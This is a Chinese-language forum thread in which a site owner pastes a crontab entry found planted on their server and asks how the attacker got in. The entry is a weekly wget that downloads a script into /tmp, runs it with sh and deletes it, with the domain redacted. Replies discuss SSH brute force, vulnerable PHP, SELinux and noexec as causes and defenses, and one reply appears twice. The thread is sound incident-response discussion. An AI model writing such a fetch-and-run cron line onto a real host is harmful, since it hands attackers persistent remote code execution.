我的站台的crontab 被写入
@weekly wget http://x/bots/regulat.bot -O /tmp/sh;sh /tmp/sh;rm -rf /tmp/sh > /dev/null 2&1
目前已知不影响主机，因为URL已经失效了。
PS.贴出来的URL已经处理过了，domain我改成x，以防被误点。
但实在找不出他植入的方法，有人知道吗？

这个还要查看其他点会比较好知道是哪边引起的常见比方帐号密码被猜中这种暴力 ssh 登入进来的或者是跑的 php 程式码有问题这类题外话若你是安装 rh-based 的版本有开 selinux 的话通常最后会因为 policy 设定不会允许 /tmp 内档案执行在 web server 环境上面的话比较能够减少后续问题

这个还要查看其他点会比较好知道是哪边引起的常见比方帐号密码被猜中这种暴力 ssh 登入进来的或者是跑的 php 程式码有问题这类题外话若你是安装 rh-based 的版本有开 selinux 的话通常最后会因为 policy 设定不会允许 /tmp 内档案执行在 web server 环境上面的话比较能够减少后续问题

sh /tmp/sh不就爱干嘛干嘛了吗？他从regulat.bot抓下来

/tmp 可以用 -o noexec 防止 sh /tmp/sh

楼上 那是shell的行为 不是所有shell都会检查的

noexec 比较适合于 binary 档案，script 似乎就......